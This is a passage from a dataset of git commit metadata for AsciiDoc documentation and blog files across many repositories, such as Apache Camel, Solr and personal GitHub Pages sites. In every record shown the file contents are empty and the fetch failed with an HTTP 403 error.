doc\/INTRODUCTION.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/INTRODUCTION.adoc","new_file":"doc\/INTRODUCTION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2a656c3b9af28a2c9ab79cf47b5ceff8617d014","subject":"Update 2017-02-02-Dev-Ops-day-3-Xamarin.adoc","message":"Update 2017-02-02-Dev-Ops-day-3-Xamarin.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2017-02-02-Dev-Ops-day-3-Xamarin.adoc","new_file":"_posts\/2017-02-02-Dev-Ops-day-3-Xamarin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3bf04ff9f37be5da8482831e50407ce817ce40e","subject":"Publish 2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","message":"Publish 2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","new_file":"2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"348237bd6a8851d991a32a63a6d631c0768c3e65","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd2a3c79ce2505836a172121d8c5e037012143d7","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 
2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da44d091646ae748828b4b3ee8b2cb3d69c91ed6","subject":"Adding dev-docs around the use of Git Worktree. (#1899)","message":"Adding dev-docs around the use of Git Worktree. (#1899)\n\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"dev-docs\/working-between-major-versions.adoc","new_file":"dev-docs\/working-between-major-versions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/solr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c6cb00b892cab007db186a43cd102144b6d3825","subject":"Update 2015-12-17-Blog-Title.adoc","message":"Update 2015-12-17-Blog-Title.adoc","repos":"vba\/vba.github.io,vba\/vba.github.io,vba\/vba.github.io","old_file":"_posts\/2015-12-17-Blog-Title.adoc","new_file":"_posts\/2015-12-17-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vba\/vba.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a952a9972ed0eeb3a1bf5ce9cd08df618937f5a3","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b74ed42aa3be51c194e5cefdde7cf13c0833370","subject":"Update 2016-07-15-Blog-Title.adoc","message":"Update 2016-07-15-Blog-Title.adoc","repos":"juliosueiras\/juliosueiras.github.io,juliosueiras\/juliosueiras.github.io,juliosueiras\/juliosueiras.github.io,juliosueiras\/juliosueiras.github.io","old_file":"_posts\/2016-07-15-Blog-Title.adoc","new_file":"_posts\/2016-07-15-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juliosueiras\/juliosueiras.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"144f2f66b8d932ecc347a85bce60bfcb9366e708","subject":"Git br 4","message":"Git br 4\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Git branching 4.adoc","new_file":"Git\/Git branching 4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d120f0778e7bedb8d7b90fa3d528b809611fdaf","subject":"y2b create post Apple iPhone 5S \\\/ 5C FULL Event Recap \\\/ 
Review","message":"y2b create post Apple iPhone 5S \\\/ 5C FULL Event Recap \\\/ Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-10-Apple-iPhone-5S--5C-FULL-Event-Recap--Review.adoc","new_file":"_posts\/2013-09-10-Apple-iPhone-5S--5C-FULL-Event-Recap--Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e061db3baa86f516f9c4db723dac48acc5b96cc","subject":"doc: Add missing documentation for Generate JWT policy","message":"doc: Add missing documentation for Generate JWT policy\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/user-guide\/publisher\/policies\/policy-generate-jwt.adoc","new_file":"pages\/apim\/user-guide\/publisher\/policies\/policy-generate-jwt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"456d32c759fed902840a04e277ca735268e1e82d","subject":"add changelog","message":"add changelog\n\nSigned-off-by: Sebastian Ho\u00df <1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>","repos":"sebhoss\/generic-types","old_file":"CHANGELOG.asciidoc","new_file":"CHANGELOG.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebhoss\/generic-types.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"6a386231d0b1b11deb16ba4dc062db81c6951268","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-plugin-core","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-plugin-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f85d711bdfe2120a19df8e19f8e48a9da31f2c4b","subject":"Update NOTES.adoc","message":"Update NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b81b47f19c558b1330492de4bb528b5ced5f1ea","subject":"Update 2015-10-08-IT-podkasty.adoc","message":"Update 2015-10-08-IT-podkasty.adoc","repos":"KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io","old_file":"_posts\/2015-10-08-IT-podkasty.adoc","new_file":"_posts\/2015-10-08-IT-podkasty.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KlimMalgin\/klimmalgin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9605e38c306b1f648715a55242cfca3fc62c4e8a","subject":"Update 2016-11-22-Hello-World.adoc","message":"Update 
2016-11-22-Hello-World.adoc","repos":"furcon\/furcon.github.io,furcon\/furcon.github.io,furcon\/furcon.github.io,furcon\/furcon.github.io","old_file":"_posts\/2016-11-22-Hello-World.adoc","new_file":"_posts\/2016-11-22-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/furcon\/furcon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb0881af43472d422407ab56c7420f831cbba39a","subject":"Update 2017-04-03-Engineering.adoc","message":"Update 2017-04-03-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-Engineering.adoc","new_file":"_posts\/2017-04-03-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96100bef3ecda11c655c2d53f9965a0c0d6f9240","subject":"Added Multicast EIP to docs","message":"Added Multicast EIP to docs\n","repos":"davidkarlsen\/camel,jamesnetherton\/camel,sverkera\/camel,zregvart\/camel,adessaigne\/camel,anoordover\/camel,DariusX\/camel,curso007\/camel,tdiesler\/camel,christophd\/camel,rmarting\/camel,kevinearls\/camel,tadayosi\/camel,anoordover\/camel,gautric\/camel,gautric\/camel,tadayosi\/camel,cunningt\/camel,Fabryprog\/camel,tadayosi\/camel,pmoerenhout\/camel,dmvolod\/camel,objectiser\/camel,Fabryprog\/camel,rmarting\/camel,pax95\/camel,gautric\/camel,alvinkwekel\/camel,jonmcewen\/camel,pmoerenhout\/camel,anoordover\/camel,punkhorn\/camel-upstream,onders86\/camel,ullgren\/camel,pmoerenhout\/camel,onders86\/camel,onders86\/camel,onders86\/camel,sverkera\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,akhettar\/camel,apache\/camel,pax95\/camel,zregvart\/camel,anoordover\/camel,christophd\/camel,gnodet\/camel,adessaigne\/camel,cunningt\/camel,Fabryprog\/camel,tdiesler\/camel,Fabryprog\/camel,CodeSmell\/camel,gnodet\/camel,curso007\/camel,sverkera\/camel,anoordover\/camel,rmarting\/camel,kevinearls\/camel,snurmine\/camel,snurmine\/camel,snurmine\/camel,curso007\/camel,gautric\/camel,alvinkwekel\/camel,anoordover\/camel,curso007\/camel,pmoerenhout\/camel,snurmine\/camel,jamesnetherton\/camel,jonmcewen\/camel,cunningt\/camel,cunningt\/camel,tdiesler\/camel,sverkera\/camel,christophd\/camel,davidkarlsen\/camel,dmvolod\/camel,CodeSmell\/camel,tdiesler\/camel,pax95\/camel,dmvolod\/camel,sverkera\/camel,ullgren\/camel,zregvart\/camel,pmoerenhout\/camel,gautric\/camel,akhettar\/camel,rmarting\/camel,nicolaferraro\/camel,onders86\/camel,kevinearls\/camel,adessaigne\/camel,punkhorn\/camel-upstream,pax95\/camel,pmoerenhout\/camel,gautric\/camel,davidkarlsen\/camel,jonmcewen\/camel,jamesnetherton\/camel,kevinearls\/camel,objectiser\/camel,zregvart\/camel,tadayosi\/camel,dmvolod\/camel,akhettar\/camel,nicolaferraro\/camel,jamesnetherton\/camel,DariusX\/camel,onders86\/camel,akhettar\/camel,gnodet\/camel,curso007\/camel,mcollovati\/camel,DariusX\/camel,rmarting\/camel,sverkera\/camel,rmarting\/camel,cunningt\/camel,pax95\/camel,snurmine\/camel,christophd\/camel,alvinkwekel\/camel,mcollovati\/camel,nikhilvibhav\/camel,dmvolod\/camel,curso007\/camel,apache\/camel,apache\/camel,akhettar\/camel,mcollovati\/camel,tadayosi\/camel,jonmcewen\/camel,gnodet\/camel,objectiser\
/camel,christophd\/camel,tdiesler\/camel,jamesnetherton\/camel,alvinkwekel\/camel,adessaigne\/camel,tdiesler\/camel,punkhorn\/camel-upstream,kevinearls\/camel,nikhilvibhav\/camel,kevinearls\/camel,CodeSmell\/camel,CodeSmell\/camel,jonmcewen\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,jonmcewen\/camel,christophd\/camel,gnodet\/camel,nicolaferraro\/camel,akhettar\/camel,pax95\/camel,ullgren\/camel,adessaigne\/camel,objectiser\/camel,mcollovati\/camel,snurmine\/camel,nikhilvibhav\/camel,ullgren\/camel,dmvolod\/camel,adessaigne\/camel,apache\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,DariusX\/camel,apache\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/multicast-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/multicast-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"504923097f32031b8a512d8012de2cb31b291efc","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe5e6e2557fc0dbd7d746186db23e987ef0c17ab","subject":"Update 2016-02-15-Test.adoc","message":"Update 2016-02-15-Test.adoc","repos":"djengineerllc\/djengineerllc.github.io,djengineerllc\/djengineerllc.github.io,djengineerllc\/djengineerllc.github.io,djengineerllc\/djengineerllc.github.io","old_file":"_posts\/2016-02-15-Test.adoc","new_file":"_posts\/2016-02-15-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djengineerllc\/djengineerllc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d4ccf40f865b72661706587d0421b9c8db44531","subject":"Sample JLP","message":"Sample JLP\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Maven central.adoc","new_file":"Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c11bb9d25be620b49e307ef1b037c013f6846966","subject":"Update 2015-12-04-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","message":"Update 2015-12-04-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-12-04-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","new_file":"_posts\/2015-12-04-Build-a-Kubernetes-Cluster-on-Raspberry-Pi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"3943bed5e005b33f48a6fc6c04494bc14e91e40b","subject":"Update 2015-07-13-Test.adoc","message":"Update 2015-07-13-Test.adoc","repos":"trangunghoa\/hubpress.io,trangunghoa\/hubpress.io,trangunghoa\/hubpress.io","old_file":"_posts\/2015-07-13-Test.adoc","new_file":"_posts\/2015-07-13-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trangunghoa\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78d46fd8ff027c03f4663ae8a42bf621cf740bfd","subject":"CAMEL-9987: Add Asciidoc documentation","message":"CAMEL-9987: Add Asciidoc documentation\n","repos":"tadayosi\/camel,yuruki\/camel,tdiesler\/camel,YoshikiHigo\/camel,RohanHart\/camel,jonmcewen\/camel,davidkarlsen\/camel,tlehoux\/camel,gnodet\/camel,YoshikiHigo\/camel,ssharma\/camel,NickCis\/camel,jkorab\/camel,bhaveshdt\/camel,curso007\/camel,neoramon\/camel,bgaudaen\/camel,yuruki\/camel,CodeSmell\/camel,RohanHart\/camel,gautric\/camel,NickCis\/camel,punkhorn\/camel-upstream,apache\/camel,cunningt\/camel,JYBESSON\/camel,lburgazzoli\/camel,drsquidop\/camel,bhaveshdt\/camel,tadayosi\/camel,bhaveshdt\/camel,sverkera\/camel,bhaveshdt\/camel,rmarting\/camel,lburgazzoli\/camel,snurmine\/camel,bhaveshdt\/camel,jlpedrosa\/camel,akhettar\/camel,gautric\/camel,borcsokj\/camel,sverkera\/camel,gnodet\/camel,objectiser\/camel,jamesnetherton\/camel,mgyongyosi\/camel,gautric\/camel,RohanHart\/camel,tlehoux\/camel,snurmine\/camel,gnodet\/camel,nicolaferraro\/camel,DariusX\/camel,JYBESSON\/camel,driseley\/camel,neoramon\/camel,davidkarlsen\/camel,jonmcewen\/camel,bgaudaen\/camel,onders86\/camel,jlpedrosa\/camel,prashant2402\/camel,sverkera\/camel,yuruki\/camel,rmarting\/camel,tlehoux\/camel,pmoerenhout\/camel,hqstevenson\/camel,alvinkwekel\/camel,ssharma\/camel,borcsokj\/camel,jamesnetherton\/camel,anoordover\/camel,oalles\/camel,anoordover\/camel,FingolfinTEK\/camel,alvinkwekel\/camel,tkopczynski\/camel,mcollovati\/camel,Thopap\/camel,mgyongyosi\/camel,tlehoux\/camel,curso007\/camel,jkorab\/camel,dmvolod\/camel,salikjan\/camel,w4tson\/camel,zregvart\/camel,ssharma\/camel,lburgazzoli\/camel,tadayosi\/camel,prashant2402\/camel,pkletsko\/camel,scranton\/camel,prashant2402\/camel,jkorab\/camel,jkorab\/camel,onders86\/camel,lburgazzoli\/camel,pax95\/camel,snurmine\/camel,sverkera\/camel,onders86\/camel,alvinkwekel\/camel,jarst\/camel,jonmcewen\/camel,anton-k11\/camel,chirino\/camel,jmandawg\/camel,isavin\/camel,isavin\/camel,mcollovati\/camel,dmvolod\/camel,anoordover\/camel,YoshikiHigo\/camel,christophd\/camel,gilfernandes\/camel,jamesnetherton\/camel,hqstevenson\/camel,yuruki\/camel,jarst\/camel,tkopczynski\/camel,jarst\/camel,yuruki\/camel,christophd\/camel,borcsokj\/camel,Fabryprog\/camel,oalles\/camel,dmvolod\/camel,nicolaferraro\/camel,nboukhed\/camel,tlehoux\/camel,snurmine\/camel,isavin\/camel,Thopap\/camel,curso007\/camel,oalles\/camel,hqstevenson\/camel,jarst\/camel,chirino\/camel,christophd\/camel,bhaveshdt\/camel,tkopczynski\/camel,sverkera\/camel,nikhilvibhav\/camel,CodeSmell\/camel,kevinearls\/camel,jkorab\/camel,dmvolod\/camel,ullgren\/camel,veithen\/camel,jmandawg\/camel,RohanHart\/camel,nikvaessen\/camel,Thopap\/camel,dmvolod\/camel,prashant2402\/camel,tdiesler\/camel,drsquidop\/camel,objectiser\/camel,curso007\/camel,nikhilvibhav\/camel,salikjan\/camel,sirlatrom\/camel,punkhorn\/camel-upstream,YoshikiHigo\/camel,apache\/camel,gilfernandes\/camel,bgaudaen\/camel,pax95\/camel,apache\/camel,tadayosi\/camel,acartapanis\/ca
mel,jonmcewen\/camel,nikvaessen\/camel,anoordover\/camel,anoordover\/camel,snurmine\/camel,alvinkwekel\/camel,cunningt\/camel,lburgazzoli\/apache-camel,borcsokj\/camel,adessaigne\/camel,lburgazzoli\/apache-camel,dmvolod\/camel,veithen\/camel,scranton\/camel,tkopczynski\/camel,pmoerenhout\/camel,objectiser\/camel,oalles\/camel,driseley\/camel,driseley\/camel,tdiesler\/camel,RohanHart\/camel,acartapanis\/camel,cunningt\/camel,sirlatrom\/camel,chirino\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,rmarting\/camel,sabre1041\/camel,NickCis\/camel,lburgazzoli\/apache-camel,bgaudaen\/camel,jamesnetherton\/camel,sirlatrom\/camel,pkletsko\/camel,oalles\/camel,neoramon\/camel,nikvaessen\/camel,ullgren\/camel,drsquidop\/camel,pkletsko\/camel,Thopap\/camel,akhettar\/camel,gnodet\/camel,chirino\/camel,punkhorn\/camel-upstream,acartapanis\/camel,Thopap\/camel,oalles\/camel,Fabryprog\/camel,onders86\/camel,driseley\/camel,pmoerenhout\/camel,sabre1041\/camel,lburgazzoli\/camel,mgyongyosi\/camel,pax95\/camel,Fabryprog\/camel,nikvaessen\/camel,NickCis\/camel,driseley\/camel,sabre1041\/camel,CodeSmell\/camel,drsquidop\/camel,FingolfinTEK\/camel,allancth\/camel,kevinearls\/camel,pmoerenhout\/camel,w4tson\/camel,NickCis\/camel,tkopczynski\/camel,scranton\/camel,scranton\/camel,drsquidop\/camel,gilfernandes\/camel,christophd\/camel,nikvaessen\/camel,sabre1041\/camel,jarst\/camel,jonmcewen\/camel,pax95\/camel,JYBESSON\/camel,curso007\/camel,mcollovati\/camel,DariusX\/camel,allancth\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,ssharma\/camel,akhettar\/camel,pmoerenhout\/camel,sabre1041\/camel,NickCis\/camel,scranton\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,kevinearls\/camel,tkopczynski\/camel,allancth\/camel,borcsokj\/camel,curso007\/camel,nboukhed\/camel,neoramon\/camel,tadayosi\/camel,tdiesler\/camel,nikvaessen\/camel,prashant2402\/camel,jlpedrosa\/camel,jonmcewen\/camel,zregvart\/camel,zregvart\/camel,w4tson\/camel,apache\/camel,pmoerenhout\/camel,DariusX\/camel,FingolfinTEK\/camel,akhettar\/camel,davidkarlsen\/camel,anton-k11\/camel,gilfernandes\/camel,zregvart\/camel,pax95\/camel,davidkarlsen\/camel,tdiesler\/camel,apache\/camel,mgyongyosi\/camel,acartapanis\/camel,ullgren\/camel,yuruki\/camel,pkletsko\/camel,adessaigne\/camel,adessaigne\/camel,nicolaferraro\/camel,FingolfinTEK\/camel,acartapanis\/camel,RohanHart\/camel,neoramon\/camel,kevinearls\/camel,tdiesler\/camel,kevinearls\/camel,rmarting\/camel,gautric\/camel,jmandawg\/camel,tadayosi\/camel,scranton\/camel,nboukhed\/camel,JYBESSON\/camel,pax95\/camel,chirino\/camel,veithen\/camel,veithen\/camel,allancth\/camel,jmandawg\/camel,hqstevenson\/camel,gnodet\/camel,pkletsko\/camel,borcsokj\/camel,sirlatrom\/camel,cunningt\/camel,hqstevenson\/camel,onders86\/camel,bgaudaen\/camel,isavin\/camel,rmarting\/camel,christophd\/camel,pkletsko\/camel,kevinearls\/camel,nboukhed\/camel,DariusX\/camel,FingolfinTEK\/camel,christophd\/camel,nboukhed\/camel,w4tson\/camel,prashant2402\/camel,Thopap\/camel,jlpedrosa\/camel,w4tson\/camel,anoordover\/camel,sabre1041\/camel,driseley\/camel,jarst\/camel,isavin\/camel,acartapanis\/camel,isavin\/camel,ssharma\/camel,apache\/camel,akhettar\/camel,jmandawg\/camel,sverkera\/camel,cunningt\/camel,jmandawg\/camel,veithen\/camel,mcollovati\/camel,jamesnetherton\/camel,hqstevenson\/camel,anton-k11\/camel,gautric\/camel,YoshikiHigo\/camel,gautric\/camel,adessaigne\/camel,objectiser\/camel,allancth\/camel,CodeSmell\/camel,JYBESSON\/camel,mgyongyosi\/camel,nboukhed\/camel,anton-k11\/camel,allancth\/camel,neoramon\/camel,J
YBESSON\/camel,jlpedrosa\/camel,jlpedrosa\/camel,adessaigne\/camel,YoshikiHigo\/camel,lburgazzoli\/camel,w4tson\/camel,onders86\/camel,adessaigne\/camel,mgyongyosi\/camel,anton-k11\/camel,ssharma\/camel,sirlatrom\/camel,bgaudaen\/camel,veithen\/camel,cunningt\/camel,gilfernandes\/camel,chirino\/camel,gilfernandes\/camel,sirlatrom\/camel,rmarting\/camel,drsquidop\/camel,tlehoux\/camel,nikhilvibhav\/camel,lburgazzoli\/apache-camel,snurmine\/camel,ullgren\/camel,anton-k11\/camel,akhettar\/camel,lburgazzoli\/apache-camel,jkorab\/camel,FingolfinTEK\/camel","old_file":"components\/camel-consul\/src\/main\/docs\/consul.adoc","new_file":"components\/camel-consul\/src\/main\/docs\/consul.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cfcc18797bab3c885be85280b642f235fd7bc902","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d6420745c9b67470fff91e8f2fa0f5f939fef76","subject":"Renamed '_posts\/2017-10-27-Go-lang-memo.adoc' to '_posts\/2017-10-27-Cmd-tips.adoc'","message":"Renamed '_posts\/2017-10-27-Go-lang-memo.adoc' to '_posts\/2017-10-27-Cmd-tips.adoc'","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2017-10-27-Cmd-tips.adoc","new_file":"_posts\/2017-10-27-Cmd-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f2b13b588e4a3dd611aae525e59fa0b46fba263","subject":"fixes #246 Need nngcat man page","message":"fixes #246 Need nngcat man page\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/man\/nngcat.adoc","new_file":"docs\/man\/nngcat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5ae366cdadbd672594fed0c2a0e732bd2163f8a","subject":"Update 2017-02-17-j-Query.adoc","message":"Update 2017-02-17-j-Query.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-17-j-Query.adoc","new_file":"_posts\/2017-02-17-j-Query.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1147386540119ac3bbc5f633c0025d57dbd95721","subject":"y2b create post HUGE 100,000 Subscriber Giveaway!","message":"y2b create post HUGE 100,000 Subscriber 
